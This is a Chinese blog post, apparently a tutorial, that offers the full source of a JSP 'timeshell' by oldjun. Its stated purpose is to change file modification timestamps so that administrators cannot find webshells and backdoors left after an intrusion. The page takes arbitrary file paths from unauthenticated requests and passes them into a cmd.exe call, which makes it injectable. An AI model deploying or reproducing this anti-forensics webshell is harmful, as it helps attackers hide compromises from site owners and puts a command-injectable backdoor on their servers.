我要评论很多网站的管理员通过查看文件的修改时间定位被入侵后流下的网马与后门,因此修改文件的创建与修改时间可以有效的预防后门的泄露。
昨天研究了下,jsp只提供了修改“文件修改时间”的接口,却没有提供修改“文件创建时间”的接口,因此貌似只能修改“文件修改时间 ”,kj021320的jsp shell有这个功能,不过只能修改年月日,而且昨晚我遇到的resin 2.1.9 运行不了kj021320的那个shell,于是决定自己写个小的shell!
主要功能:
1.文件的时间属性查看,包括修改时间与创建时间;
2.文件修改时间的修改,精确到秒;
代码如下:
(apache tomcat/6.0.18下运行通过!)
复制代码
代码如下:<%@ page import="java.io.*" %>
<%@ page import="java.util.*, java.text.*" %>
<%@ page language="java" import="java.util.enumeration" contenttype="text/html; charset=gb2312"%>
<html>
<head>
<title>jsp timeshell by oldjun</title>
<meta http-equiv="content-type" content="text/html; charset=gb2312"></head>
<body>
<h1>jsp timeshell by oldjun</h1>
<%!
public static string getfilecreatedate(file _file) {
file file = _file;
try {
process ls_proc = runtime.getruntime().exec("cmd.exe /c dir \"" + file.getabsolutepath() + "\" /tc");
bufferedreader br = new bufferedreader(new inputstreamreader(ls_proc.getinputstream()));
for (int i = 0; i < 5; i++) {
br.readline();
}
string stuff = br.readline();
stringtokenizer st = new stringtokenizer(stuff);
string datec = st.nexttoken();
string time = st.nexttoken();
string datetime = datec.concat(" "+time);
br.close();
return datetime;
} catch (exception e) {
return null;
}
}
string folderreplace(string folder){
return folder.replace('\\','/');
}
%>
<%
string action = null;
if (request.getparameter("action") == null)
action = "main";
else
action = (string)request.getparameter("action");
if (action.equals("main")) {
%>
<form name= form1 method="post" action="?action=getinfo">
filepath:<input name="file" type="text" size="100" />
(for instance c:/program files/apache software foundation/tomcat 6.0/webapps/root/time.jsp)
<input type="submit" name="button" value="getinfo"/>
</form>
<%
}else if (action.equals("getinfo")) {
string filepath = folderreplace(request.getparameter("file"));
file file = new file(filepath);
if(!file.exists()){
out.println("<script lanugage=\"javascript\">alert(\"file:"+filepath+" not find!\");history.back();</script>");
}
%>
filepath:
<%=filepath%>
lastmodifiedtime:
<%=new date(file.lastmodified())%>
createtime:
<%
string createtime=getfilecreatedate(file);
out.println(createtime);
%>
now:
<%
date mydate = new date();
out.println(mydate.tolocalestring());
%>
<form name= form2 method="post" action="?action=change">
<input name="year" type="text" size="10"/>year
<input name="month" type="text" size="10"/>month
<input name="day" type="text" size="10"/>day
<input name="hour" type="text" size="10"/>hour
<input name="min" type="text" size="10"/>minute
<input name="sec" type="text" size="10"/>second
<input name="file" type="hidden" value="<%=filepath%>" />
<input type="submit" name="button" value="change"/>
</form>
<%
}else if (action.equals("change")) {
string url="?action=main";
string filepath = folderreplace(request.getparameter("file"));
string year = request.getparameter("year");
string month = request.getparameter("month");
string day = request.getparameter("day");
string hour = request.getparameter("hour");
string min = request.getparameter("min");
string sec = request.getparameter("sec");
file file = new file(filepath);
calendar calendar=calendar.getinstance();
calendar.set(integer.parseint(year),integer.parseint(month),integer.parseint(day),integer.parseint(hour),integer.parseint(min),integer.parseint(sec));
if(file.setlastmodified(calendar.gettimeinmillis()))
out.println("<script lanugage=\"javascript\">alert(\"file date change success!\");location.href=\""+url+"\";</script>");
else
out.println("<script lanugage=\"javascript\">alert(\"time error!\");history.back();</script>");
}
%>
</body>
</html>
发表评论